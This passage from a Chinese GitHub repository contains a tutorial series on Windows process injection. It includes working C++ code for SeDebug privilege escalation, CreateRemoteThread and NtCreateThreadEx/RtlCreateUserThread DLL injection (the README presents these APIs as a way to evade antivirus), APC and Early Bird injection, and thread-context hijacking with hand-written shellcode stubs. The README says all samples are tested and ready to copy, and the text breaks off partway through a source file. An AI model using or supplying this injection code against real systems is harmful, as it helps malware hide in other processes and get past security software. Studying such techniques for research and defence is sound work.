├── LICENSE
├── README.md
├── img
└── gzh.png
├── 第一课
├── README.md
├── 常规提权手法
│ └── GetSeDebugPrivilege.cpp
└── 高级提权手法
│ └── GetSeDebugPrivilegePro.cpp
├── 第七课
├── Early-Bird
│ ├── SuspendAPCInject.cpp
│ ├── SuspendAPCInject.vcxproj
│ └── SuspendAPCInject.vcxproj.filters
├── LocalAPCInject
│ ├── LocalAPCInject.cpp
│ ├── LocalAPCInject.vcxproj
│ └── LocalAPCInject.vcxproj.filters
└── README.md
├── 第三课
├── CreateRemoteThreadPro.cpp
├── CreateRemoteThreadPro.vcxproj
└── CreateRemoteThreadPro.vcxproj.filters
├── 第二课
├── RemoteProcessInjection.cpp
├── RemoteProcessInjection.vcxproj
└── RemoteProcessInjection.vcxproj.filters
├── 第五课
├── InjectWithCreateSuspended.cpp
├── InjectWithCreateSuspended.vcxproj
└── InjectWithCreateSuspended.vcxproj.filters
├── 第八课
├── FunctionStomping.cpp
├── FunctionStomping.vcxproj
└── FunctionStomping.vcxproj.filters
├── 第六课
├── APCInjectRing3.cpp
├── APCInjectRing3.vcxproj
└── APCInjectRing3.vcxproj.filters
└── 第四课
├── InjectWithSetThreadContext.cpp
├── InjectWithSetThreadContext.vcxproj
└── InjectWithSetThreadContext.vcxproj.filters
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547 | not convey it at all. For example, if you agree to terms that obligate you
548 | to collect a royalty for further conveying from those to whom you convey
549 | the Program, the only way you could satisfy both those terms and this
550 | License would be to refrain entirely from conveying the Program.
551 |
552 | 13. Use with the GNU Affero General Public License.
553 |
554 | Notwithstanding any other provision of this License, you have
555 | permission to link or combine any covered work with a work licensed
556 | under version 3 of the GNU Affero General Public License into a single
557 | combined work, and to convey the resulting work. The terms of this
558 | License will continue to apply to the part which is the covered work,
559 | but the special requirements of the GNU Affero General Public License,
560 | section 13, concerning interaction through a network will apply to the
561 | combination as such.
562 |
563 | 14. Revised Versions of this License.
564 |
565 | The Free Software Foundation may publish revised and/or new versions of
566 | the GNU General Public License from time to time. Such new versions will
567 | be similar in spirit to the present version, but may differ in detail to
568 | address new problems or concerns.
569 |
570 | Each version is given a distinguishing version number. If the
571 | Program specifies that a certain numbered version of the GNU General
572 | Public License "or any later version" applies to it, you have the
573 | option of following the terms and conditions either of that numbered
574 | version or of any later version published by the Free Software
575 | Foundation. If the Program does not specify a version number of the
576 | GNU General Public License, you may choose any version ever published
577 | by the Free Software Foundation.
578 |
579 | If the Program specifies that a proxy can decide which future
580 | versions of the GNU General Public License can be used, that proxy's
581 | public statement of acceptance of a version permanently authorizes you
582 | to choose that version for the Program.
583 |
584 | Later license versions may give you additional or different
585 | permissions. However, no additional obligations are imposed on any
586 | author or copyright holder as a result of your choosing to follow a
587 | later version.
588 |
589 | 15. Disclaimer of Warranty.
590 |
591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
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597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
599 |
600 | 16. Limitation of Liability.
601 |
602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
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609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
610 | SUCH DAMAGES.
611 |
612 | 17. Interpretation of Sections 15 and 16.
613 |
614 | If the disclaimer of warranty and limitation of liability provided
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616 | reviewing courts shall apply local law that most closely approximates
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618 | Program, unless a warranty or assumption of liability accompanies a
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620 |
621 | END OF TERMS AND CONDITIONS
622 |
623 | How to Apply These Terms to Your New Programs
624 |
625 | If you develop a new program, and you want it to be of the greatest
626 | possible use to the public, the best way to achieve this is to make it
627 | free software which everyone can redistribute and change under these terms.
628 |
629 | To do so, attach the following notices to the program. It is safest
630 | to attach them to the start of each source file to most effectively
631 | state the exclusion of warranty; and each file should have at least
632 | the "copyright" line and a pointer to where the full notice is found.
633 |
634 |
635 | Copyright (C)
636 |
637 | This program is free software: you can redistribute it and/or modify
638 | it under the terms of the GNU General Public License as published by
639 | the Free Software Foundation, either version 3 of the License, or
640 | (at your option) any later version.
641 |
642 | This program is distributed in the hope that it will be useful,
643 | but WITHOUT ANY WARRANTY; without even the implied warranty of
644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
645 | GNU General Public License for more details.
646 |
647 | You should have received a copy of the GNU General Public License
648 | along with this program. If not, see .
649 |
650 | Also add information on how to contact you by electronic and paper mail.
651 |
652 | If the program does terminal interaction, make it output a short
653 | notice like this when it starts in an interactive mode:
654 |
655 | Copyright (C)
656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
657 | This is free software, and you are welcome to redistribute it
658 | under certain conditions; type `show c' for details.
659 |
660 | The hypothetical commands `show w' and `show c' should show the appropriate
661 | parts of the General Public License. Of course, your program's commands
662 | might be different; for a GUI interface, you would use an "about box".
663 |
664 | You should also get your employer (if you work as a programmer) or school,
665 | if any, to sign a "copyright disclaimer" for the program, if necessary.
666 | For more information on this, and how to apply and follow the GNU GPL, see
667 | .
668 |
669 | The GNU General Public License does not permit incorporating your program
670 | into proprietary programs. If your program is a subroutine library, you
671 | may consider it more useful to permit linking proprietary applications with
672 | the library. If this is what you want to do, use the GNU Lesser General
673 | Public License instead of this License. But first, please read
674 | .
675 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Process-Injection
2 | > 目前网上进程注入的文章很多,但是代码质量参差不齐,很多还只有x86下的代码,同时对于进程注入的探讨大多停留在各种注入手法上,缺少系列的汇总性的研究文章,故想要在本项目中汇总所有可以接触到的进程注入的手法,自行研究复现总结成文章,同时会将调试好的可执行的代码贴出,完成对x86/x64版本的测试,以此来促进自己的学习,同时也欢迎师傅们提Issue,一起交流讨论~
3 |
4 |
5 |
6 | ## 开发环境
7 |
8 | - 操作系统:Windows 10
9 | - IDEA:Visual Studio 2019
10 |
11 | **注:项目内所有代码均经过测试,确保x86/x64下均可用,并能实现注入效果, 使用时请修改Dll路径**
12 |
13 |
14 |
15 | ## 原理分析
16 |
17 | 详细的原理分析和代码的拆解分析,听说,学进程注入,代码和文章一起更配哟~欢迎催更hhhhh~
18 |
19 | | | 题目 | 手法 | 链接 | 完成 |
20 | | ---------- | ------------------ | ------------------------------------------------ | ------------------------------------------------- | ---- |
21 | | 第一课 | 进程提权原理 | 获取SE_DEBUG权限 | https://mp.weixin.qq.com/s/NkJOfiRIBnqyzVh3_fE22Q | √ |
22 | | 第二课 | 远程线程注入 | 最经典的进程注入手法 | https://mp.weixin.qq.com/s/7lHqfWrewgiVtTXGhVXfQA | √ |
23 | | 第三课 | 远程线程注入进阶 | 利用未导出API躲避杀软 | https://mp.weixin.qq.com/s/0zBPrC42zB6fkDZAEn92ww | √ |
24 | | 第四课 | 远程线程注入进阶二 | 用类似调试器的思想来注入 | https://mp.weixin.qq.com/s/O80hGlJWRMkH-r1SoWzE8A | √ |
25 | | 第五课 | 创建进程挂起注入 | 以CREATE_SUSPENDED标志创建进程 | https://mp.weixin.qq.com/s/QifTJZGg4dtO9YtSv8a5Ug | √ |
26 | | 第六课 | APC注入 | 用户态下APC注入方式 | https://mp.weixin.qq.com/s/1h3msxhF6I_JLKAXU-1oeg | √ |
27 | | ~~第七课~~ | ~~APC注入进阶~~ | ~~内核态下APC注入方式~~ | ~~n周内更新~~(遇到许多问题,后续填坑) | × |
28 | | 第七课 | APC注入进阶 | 创建挂起进程APC注入+利用NtTestAlert在本地APC注入 | https://mp.weixin.qq.com/s/iaYT5iKBYIm-iTLn_4jR7Q | √ |
29 | | 第八课 | FunctionStomping | 掏空执行模块的指定函数实现注入 | ... | √ |
30 | | ... | ... | ... | ... | |
31 |
32 | 至少是10节~会持续更新的
33 |
34 |
35 |
36 | ## issue
37 |
38 | [我要提交建议或问题](https://github.com/Gality369/Process-Injection/issues)
39 |
40 |
41 |
42 | ## LICENSE
43 |
44 | [GNU General Public License v3.0](https://github.com/Gality369/Process-Injection/blob/main/LICENSE)
45 |
46 |
47 |
48 | ## 关于其他
49 |
50 | 如果你觉得这个项目不错,请给我一个Star~
51 |
52 | 也宣传下团队~🎉**Wgpsec狼组安全团队**~致力于构建安全安全乌托邦 => https://www.wgpsec.org/
53 |
54 | 也欢迎关注公众号,一起来交流讨论学习q(≧▽≦q)~
55 |
56 | 
57 |
58 |
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/img/gzh.png:
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https://raw.githubusercontent.com/Gality369/Process-Injection/16168a63c4cc62cb5d4ead2c49934b990a077dc3/img/gzh.png
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/第一课/README.md:
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1 | # 使用
2 | 两种手法都已经封装成函数, 在需要获取SeDebug权限时,直接将代码复制进项目,然后按照类似如下格式去调用即可
3 |
4 | ```c++
5 | if (EnableDebugPrivilege() == FALSE) {
6 | printf("failed to get SeDebug Privilege");
7 | return -1;
8 | }
9 | ```
10 |
11 | 还是不知道怎么用的话,请参考第二节课中的用法
--------------------------------------------------------------------------------
/第一课/常规提权手法/GetSeDebugPrivilege.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | BOOL EnableDebugPrivilege() {
6 | HANDLE TokenHandle = NULL;
7 | TOKEN_PRIVILEGES TokenPrivilege;
8 |
9 | LUID uID;
10 | if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &TokenHandle)) {
11 | if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &uID)) {
12 | TokenPrivilege.PrivilegeCount = 1;
13 | TokenPrivilege.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
14 | TokenPrivilege.Privileges[0].Luid = uID;
15 | if (AdjustTokenPrivileges(TokenHandle, FALSE, &TokenPrivilege, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
16 | CloseHandle(TokenHandle);
17 | TokenHandle = INVALID_HANDLE_VALUE;
18 | return TRUE;
19 | }
20 | else
21 | goto Fail;
22 |
23 | }
24 | else
25 | goto Fail;
26 | }
27 | else
28 | goto Fail;
29 |
30 | Fail:
31 | CloseHandle(TokenHandle);
32 | TokenHandle = INVALID_HANDLE_VALUE;
33 | return FALSE;
34 | }
--------------------------------------------------------------------------------
/第一课/高级提权手法/GetSeDebugPrivilegePro.cpp:
--------------------------------------------------------------------------------
1 |
2 | #include
3 | #include
4 | #include
5 | using namespace std;
6 |
7 | BOOL EnableDebugPrivilege() {
8 | const unsigned long SE_DEBUG_PRIVILEGE = 0x13;
9 | typedef int(_stdcall* _RtlAdjustPrivilege)(int, BOOL, BOOL, int*);
10 | HMODULE hNtDll = LoadLibrary(_T("NTDLL.dll")); //导入ntdll
11 | if (!hNtDll) {
12 | cout << "Error.." << endl;
13 | return FALSE;
14 | }
15 | _RtlAdjustPrivilege pfnRtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(hNtDll, "RtlAdjustPrivilege");//拿到RtlAdjustPrivilege函数地址
16 |
17 | int nEn = 0;
18 | pfnRtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &nEn); //使用该函数
19 |
20 | return TRUE;
21 | }
--------------------------------------------------------------------------------
/第七课/Early-Bird/SuspendAPCInject.cpp:
--------------------------------------------------------------------------------
1 | // SuspendAPCInject.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
2 | //
3 |
4 | #include
5 | #include
6 | #include
7 | using namespace std;
8 |
9 | BOOL DoInjection(CHAR* ProcessFullPath, CHAR* wzDllFullPath) {
10 | //申请内存
11 | WCHAR* lpAddr = NULL;
12 | SIZE_T page_size = 4096;
13 | STARTUPINFOA si = { 0 };
14 | PROCESS_INFORMATION pi = { 0 };
15 |
16 | CreateProcessA(ProcessFullPath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
17 | HANDLE victimProcess = pi.hProcess;
18 | HANDLE threadHandle = pi.hThread;
19 |
20 |
21 | lpAddr = (WCHAR*)VirtualAllocEx(victimProcess, nullptr, page_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
22 | if (!lpAddr) {
23 | VirtualFreeEx(victimProcess, lpAddr, page_size, MEM_DECOMMIT);
24 | CloseHandle(victimProcess);
25 | return FALSE;
26 | }
27 |
28 | //把Dll的路径复制到内存中
29 | if (!WriteProcessMemory(victimProcess, lpAddr, wzDllFullPath, (strlen(wzDllFullPath) + 1) * sizeof(wzDllFullPath), nullptr)) {
30 | VirtualFreeEx(victimProcess, lpAddr, page_size, MEM_DECOMMIT);
31 | CloseHandle(victimProcess);
32 | return FALSE;
33 | }
34 |
35 | //获得LoadLibraryA的地址
36 | auto loadLibraryAddress = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");
37 | //APC注入
38 | if (!QueueUserAPC((PAPCFUNC)loadLibraryAddress, threadHandle, (ULONG_PTR)lpAddr)) {
39 | return FALSE;
40 | }
41 |
42 | ResumeThread(threadHandle);
43 | return TRUE;
44 | }
45 |
46 |
47 | int main()
48 | {
49 | CHAR ProcessFullPath[MAX_PATH] = { 0 };
50 | printf("Input the Executable File Full Path:");
51 | cin >> ProcessFullPath;
52 | CHAR wzDllFullPath[MAX_PATH] = { 0 };
53 |
54 |
55 | #ifndef _WIN64
56 | strcpy_s(wzDllFullPath, "D:\\project\\TestDll\\Release\\TestDll.dll");
57 | #else // _WIN64
58 | strcpy_s(wzDllFullPath, "D:\\project\\TestDll\\x64\\Release\\TestDll.dll");
59 | #endif
60 |
61 |
62 | //注入
63 | if (!DoInjection(ProcessFullPath, wzDllFullPath)) {
64 | printf("Failed to inject DLL\n");
65 | return FALSE;
66 | }
67 | printf("Success to Inject DLL!\n");
68 | return 0;
69 | }
70 |
--------------------------------------------------------------------------------
/第七课/Early-Bird/SuspendAPCInject.vcxproj:
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133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
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/第七课/LocalAPCInject/LocalAPCInject.cpp:
--------------------------------------------------------------------------------
1 | // LocalAPCInject.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
2 | //
3 |
4 | #include
5 | #include
6 |
7 | #pragma comment(lib, "ntdll")
8 | using myNtTestAlert = NTSTATUS(NTAPI*)();
9 |
10 | int main()
11 | {
12 | CHAR DllFullPath[MAX_PATH] = { 0 };
13 |
14 | #ifndef _WIN64
15 | strcpy_s(DllFullPath, "D:\\project\\TestDll\\Release\\TestDll.dll");
16 | #else // _WIN64
17 | strcpy_s(DllFullPath, "D:\\project\\TestDll\\x64\\Release\\TestDll.dll");
18 | #endif
19 |
20 | myNtTestAlert testAlert = (myNtTestAlert)(GetProcAddress(GetModuleHandleA("ntdll"), "NtTestAlert"));
21 | LPVOID lpAddr = VirtualAlloc(NULL, sizeof(DllFullPath), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
22 |
23 | WriteProcessMemory(GetCurrentProcess(), lpAddr, DllFullPath, sizeof(DllFullPath), NULL);
24 |
25 |
26 | //获得LoadLibraryA的地址
27 | auto loadLibraryAddress = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");
28 | //APC注入
29 | if (!QueueUserAPC((PAPCFUNC)loadLibraryAddress, GetCurrentThread(), (ULONG_PTR)lpAddr)) {
30 | printf("Inject APC Queue");
31 | }
32 | testAlert();
33 |
34 | return 0;
35 | }
--------------------------------------------------------------------------------
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88 | true
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91 |
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16 |
17 |
18 |
19 | 源文件
20 |
21 |
22 |
--------------------------------------------------------------------------------
/第七课/README.md:
--------------------------------------------------------------------------------
1 | # 目录结构
2 |
3 | - Early-Bird:创建挂起进程进行APC注入的代码
4 | - LocalAPCInject: 利用NtTestAlert在本地进程进行APC注入
--------------------------------------------------------------------------------
/第三课/CreateRemoteThreadPro.cpp:
--------------------------------------------------------------------------------
1 | // CreateRemoteThreadPro.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
2 | //
3 |
4 | #include
5 | using namespace std;
6 | #include
7 | #include
8 |
9 | HANDLE RtlCreateUserThread(
10 | HANDLE hProcess,
11 | LPVOID lpBaseAddress,
12 | LPVOID lpSpace
13 | )
14 | {
15 | //The prototype of RtlCreateUserThread from undocumented.ntinternals.com
16 | typedef DWORD(WINAPI* functypeRtlCreateUserThread)(
17 | HANDLE ProcessHandle,
18 | PSECURITY_DESCRIPTOR SecurityDescriptor,
19 | BOOL CreateSuspended,
20 | ULONG StackZeroBits,
21 | PULONG StackReserved,
22 | PULONG StackCommit,
23 | LPVOID StartAddress,
24 | LPVOID StartParameter,
25 | HANDLE ThreadHandle,
26 | LPVOID ClientID
27 | );
28 |
29 | //Get handle for ntdll which contains RtlCreateUserThread
30 | HANDLE hRemoteThread = NULL;
31 | HMODULE hNtDllModule = GetModuleHandle(_T("ntdll.dll"));
32 |
33 | if (hNtDllModule == NULL)
34 | {
35 | return NULL;
36 | }
37 |
38 | functypeRtlCreateUserThread funcRtlCreateUserThread = (functypeRtlCreateUserThread)GetProcAddress(hNtDllModule, "RtlCreateUserThread");
39 |
40 | if (!funcRtlCreateUserThread)
41 | {
42 | return NULL;
43 | }
44 |
45 | funcRtlCreateUserThread(hProcess, NULL, 0, 0, 0, 0, lpBaseAddress, lpSpace,
46 | &hRemoteThread, NULL);
47 | DWORD lastError = GetLastError();
48 | return hRemoteThread;
49 | }
50 |
51 | // NtCreateThreadEx模板
52 | HANDLE NtCreateThreadEx(
53 | HANDLE hProcess,
54 | LPVOID lpBaseAddress,
55 | LPVOID lpSpace
56 | )
57 | {
58 | //The prototype of NtCreateThreadEx from undocumented.ntinternals.com
59 | typedef DWORD(WINAPI* functypeNtCreateThreadEx)(
60 | PHANDLE ThreadHandle,
61 | ACCESS_MASK DesiredAccess,
62 | LPVOID ObjectAttributes,
63 | HANDLE ProcessHandle,
64 | LPTHREAD_START_ROUTINE lpStartAddress,
65 | LPVOID lpParameter,
66 | BOOL CreateSuspended,
67 | DWORD dwStackSize,
68 | DWORD Unknown1,
69 | DWORD Unknown2,
70 | LPVOID Unknown3
71 | );
72 |
73 | //Get handle for ntdll which contains NtCreateThreadEx
74 | HANDLE hRemoteThread = NULL;
75 | HMODULE hNtDllModule = GetModuleHandle(_T("ntdll.dll"));
76 | if (hNtDllModule == NULL)
77 | {
78 | return NULL;
79 | }
80 |
81 | functypeNtCreateThreadEx funcNtCreateThreadEx = (functypeNtCreateThreadEx)GetProcAddress(hNtDllModule, "NtCreateThreadEx");
82 | if (!funcNtCreateThreadEx)
83 | {
84 | return NULL;
85 | }
86 | funcNtCreateThreadEx(&hRemoteThread, GENERIC_ALL, NULL, hProcess, (LPTHREAD_START_ROUTINE)lpBaseAddress, lpSpace, FALSE, NULL, NULL, NULL, NULL);
87 |
88 | return hRemoteThread;
89 | }
90 |
91 | int InjectDllByRemoteThreadPro(ULONG32 ulTargetProcessID, WCHAR* wzDllFullPath, int method)
92 | {
93 | //Gets the process handle for the target process
94 | HANDLE TargetProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ulTargetProcessID);
95 | if (OpenProcess == NULL)
96 | {
97 | puts("Could not find process\n");
98 | }
99 |
100 |
101 | //Allocates space inside for inject.dll to our target process
102 | ULONG32 ulDllLength = (ULONG32)_tcslen(wzDllFullPath) + 1;
103 | LPVOID lpSpace = (LPVOID)VirtualAllocEx(TargetProcessHandle, NULL, ulDllLength * sizeof(ULONG32), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
104 | if (lpSpace == NULL)
105 | {
106 | printf("Could not allocate memory in process %u\n", ulTargetProcessID);
107 | return -1;
108 | }
109 |
110 | //Write dll path to memory of process
111 | int n = WriteProcessMemory(TargetProcessHandle, lpSpace, (LPVOID)wzDllFullPath, ulDllLength * sizeof(WCHAR), NULL);
112 | if (n == 0)
113 | {
114 | puts("Could not write to process's address space\n");
115 | return -1;
116 | }
117 |
118 | HMODULE hModule = GetModuleHandle(_T("kernel32.dll"));
119 | //Gets address for LoadLibraryA in kernel32.dll
120 | LPVOID lpBaseAddress = (LPVOID)GetProcAddress(hModule, "LoadLibraryW");
121 |
122 | if (lpBaseAddress == NULL)
123 | {
124 | puts("Unable to locate LoadLibraryW\n");
125 | return -1;
126 | }
127 |
128 |
129 |
130 | HANDLE ThreadHandle = INVALID_HANDLE_VALUE;
131 |
132 | switch (method)
133 | {
134 | case 1:
135 | ThreadHandle = NtCreateThreadEx(TargetProcessHandle, lpBaseAddress, lpSpace);
136 | break;
137 | case 2:
138 | ThreadHandle = RtlCreateUserThread(TargetProcessHandle, lpBaseAddress, lpSpace);
139 | break;
140 | }
141 |
142 | if (ThreadHandle == NULL)
143 | {
144 | return -1;
145 | }
146 | else
147 | {
148 | DWORD threadId = GetThreadId(ThreadHandle);
149 | DWORD processId = GetProcessIdOfThread(ThreadHandle);
150 | printf("Injected thread id: %u for pid: %u", threadId, processId);
151 |
152 | getchar();
153 | CloseHandle(TargetProcessHandle);
154 | return 0;
155 | }
156 | }
157 |
158 | int _tmain(int argc, _TCHAR* argv[])
159 | {
160 | //if (EnableDebugPrivilege() == FALSE) {
161 | // return 0;
162 | //}
163 |
164 | ULONG32 ulProcessID = 0;
165 | printf("Input the Process ID:");
166 | cin >> ulProcessID;
167 | WCHAR wzDllFullPath[MAX_PATH] = { 0 };
168 | int method = 0;
169 | printf("Which method?\n 1: NtCreateThread, 2: RtlCreateUserThread :");
170 | cin >> method;
171 | #ifndef _WIN64
172 | wcsncat_s(wzDllFullPath, L"D:\\project\\TestDll\\Release\\TestDll.dll", 60);
173 | #else // _WIN64
174 | wcsncat_s(wzDllFullPath, L"D:\\project\\TestDll\\x64\\Release\\TestDll.dll", 60);
175 | #endif
176 | int result = InjectDllByRemoteThreadPro(ulProcessID, wzDllFullPath, method);
177 | if (result == -1)
178 | {
179 | puts("Could not inject into PID");
180 | }
181 | return 0;
182 | }
--------------------------------------------------------------------------------
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/第二课/RemoteProcessInjection.cpp:
--------------------------------------------------------------------------------
1 | // RemoteProcessInjection.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
2 | //
3 |
4 | #include
5 | #include
6 | #include
7 | using namespace std;
8 | BOOL EnableDebugPrivilege();
9 | BOOL InjectDllByRemoteThread(ULONG32 ulTargetProcessID, WCHAR* wzDllFullPath);
10 |
11 | int _tmain(int argc, _TCHAR* argv[])
12 | {
13 | if (EnableDebugPrivilege() == FALSE) {
14 | printf("failed to get SeDebug Privilege");
15 | return -1;
16 | }
17 | ULONG32 ulProcessID = 0;
18 | printf("Input the Process ID:");
19 | cin >> ulProcessID;
20 | WCHAR wzDllFullPath[MAX_PATH] = { 0 };
21 | #ifndef _WIN64
22 | wcsncat_s(wzDllFullPath, L"D:\\project\\TestDll\\Release\\TestDll.dll", 60);
23 | #else // _WIN64
24 | wcsncat_s(wzDllFullPath, L"D:\\project\\TestDll\\x64\\Release\\TestDll.dll", 60);
25 | #endif
26 | InjectDllByRemoteThread(ulProcessID, wzDllFullPath);
27 | return 0;
28 | }
29 |
30 |
31 | BOOL EnableDebugPrivilege() {
32 | const unsigned long SE_DEBUG_PRIVILEGE = 0x13;
33 | typedef int(_stdcall* _RtlAdjustPrivilege)(int, BOOL, BOOL, int*);
34 | HMODULE hNtDll = LoadLibrary(_T("NTDLL.dll")); //导入ntdll
35 | if (!hNtDll) {
36 | cout << "Error.." << endl;
37 | return FALSE;
38 | }
39 | _RtlAdjustPrivilege pfnRtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(hNtDll, "RtlAdjustPrivilege");//拿到RtlAdjustPrivilege函数地址
40 |
41 | int nEn = 0;
42 | pfnRtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &nEn); //使用该函数
43 |
44 | return TRUE;
45 | }
46 |
47 |
48 | BOOL InjectDllByRemoteThread(ULONG32 ulTargetProcessID, WCHAR* wzDllFullPath) {
49 | HANDLE TargetProcessHandle = NULL;
50 | TargetProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ulTargetProcessID);
51 | //open handle
52 | if (TargetProcessHandle == NULL) {
53 | printf("failed to open Process");
54 | return FALSE;
55 | }
56 |
57 | //get address of remote process
58 | WCHAR* VirtualAddress = NULL;
59 | ULONG32 ulDllLength = (ULONG32)_tcslen(wzDllFullPath) + 1;
60 | VirtualAddress = (WCHAR*)VirtualAllocEx(TargetProcessHandle, NULL, ulDllLength * sizeof(ULONG32), MEM_COMMIT, PAGE_READWRITE);
61 | if (VirtualAddress == NULL) {
62 | printf("failed to Alloc!");
63 | CloseHandle(TargetProcessHandle);
64 | return FALSE;
65 | }
66 |
67 | //write
68 | if (FALSE == WriteProcessMemory(TargetProcessHandle, VirtualAddress, (LPVOID)wzDllFullPath, ulDllLength * sizeof(WCHAR), NULL)) {
69 | printf("failed to write\n");
70 | VirtualFreeEx(TargetProcessHandle, VirtualAddress, ulDllLength, MEM_DECOMMIT | MEM_RELEASE);
71 | CloseHandle(TargetProcessHandle);
72 | return FALSE;
73 | }
74 | LPTHREAD_START_ROUTINE FunctionAddress = NULL;
75 | FunctionAddress = (LPTHREAD_START_ROUTINE)::GetProcAddress(::GetModuleHandle(_T("kernel32")), "LoadLibraryW");
76 | HANDLE ThreadHandle = INVALID_HANDLE_VALUE;
77 |
78 | //start
79 | ThreadHandle = CreateRemoteThread(TargetProcessHandle, NULL, 0, FunctionAddress, VirtualAddress, 0, NULL);
80 | if (ThreadHandle == NULL) {
81 | VirtualFreeEx(TargetProcessHandle, VirtualAddress, ulDllLength, MEM_DECOMMIT | MEM_RELEASE);
82 | CloseHandle(TargetProcessHandle);
83 | return FALSE;
84 | }
85 |
86 | //wait for single object
87 | WaitForSingleObject(ThreadHandle, INFINITE);
88 | VirtualFreeEx(TargetProcessHandle, VirtualAddress, ulDllLength, MEM_DECOMMIT | MEM_RELEASE);
89 | CloseHandle(ThreadHandle);
90 | CloseHandle(TargetProcessHandle);
91 | return TRUE;
92 |
93 | }
--------------------------------------------------------------------------------
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/第五课/InjectWithCreateSuspended.cpp:
--------------------------------------------------------------------------------
1 | // InjectWithCreateSuspended.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
2 | //
3 | #include
4 | #include
5 | using namespace std;
6 |
7 | BOOL InjectDll(CHAR* ProcessFullPath, CHAR* DllFullPath) {
8 | #ifdef _WIN64
9 | BYTE code[] = {
10 | 0x48, 0x83, 0xEC, 0x28, //sub rsp,28h
11 | 0x48, 0x89, 0x44, 0x24, 0x18, //mov qword ptr [rsp+18h],rax
12 | 0x48, 0x89, 0x4C, 0x24, 0x10, //mov qword ptr [rsp+10h],rcx
13 | 0x48, 0xB9, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11, //mov rcx,1111111111111111h
14 | 0x48, 0xB8, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, //mov rax,2222222222222222h
15 | 0xFF, 0xD0, //call rax
16 | 0x48, 0x8B, 0x4C, 0x24, 0x10, //mov rcx,qword ptr [rsp+10h]
17 | 0x48, 0x8B, 0x44, 0x24, 0x18, //mov rax,qword ptr [rsp+18h]
18 | 0x48, 0x83, 0xC4, 0x28, //add rsp,28h
19 | 0x48, 0x83, 0xEC, 0x08, //sub rsp,8
20 | 0xC7, 0x04, 0x24, 0x33, 0x33, 0x33, 0x33, //mov dword ptr [rsp],33333333h
21 | 0xC7, 0x44, 0x24, 0x04, 0x33, 0x33, 0x33, 0x33, //mov dword ptr [rsp + 4], 33333333h
22 | 0xC3 //ret
23 | };
24 | #else
25 | BYTE code[] = {
26 | 0x60,
27 | 0x68, 0x11, 0x11, 0x11, 0x11,
28 | 0xb8, 0x22, 0x22, 0x22, 0x22,
29 | 0xff, 0xd0,
30 | 0x61,
31 | 0x68, 0x33, 0x33, 0x33, 0x33,
32 | 0xc3
33 | };
34 | #endif // _WIN64
35 |
36 | CONTEXT ctx;
37 |
38 | //创建挂起线程
39 | PROCESS_INFORMATION pi;
40 | STARTUPINFOA Startup;
41 | ZeroMemory(&Startup, sizeof(Startup));
42 | ZeroMemory(&pi, sizeof(pi));
43 | if (!CreateProcessA(ProcessFullPath, NULL, NULL, NULL, NULL, CREATE_SUSPENDED, NULL, NULL, &Startup, &pi)) {
44 | return false;
45 | }
46 | printf("创建的进程的ID为:%d\n", pi.dwProcessId);
47 |
48 | //申请空间
49 | LPVOID RemoteDllPath = VirtualAllocEx(pi.hProcess, NULL, strlen(DllFullPath) + 1, MEM_COMMIT, PAGE_READWRITE);
50 | printf("DLL路径申请的地址:%p\n", RemoteDllPath);
51 | LPVOID RemoteCodePath = VirtualAllocEx(pi.hProcess, NULL, sizeof(code) + 1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
52 | printf("Code申请的地址:%p\n", RemoteCodePath);
53 | //获取上下文
54 | ctx.ContextFlags = CONTEXT_CONTROL;
55 | GetThreadContext(pi.hThread, &ctx);
56 |
57 | //获取LoadLibrary地址
58 | auto loadLibraryAddress = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");
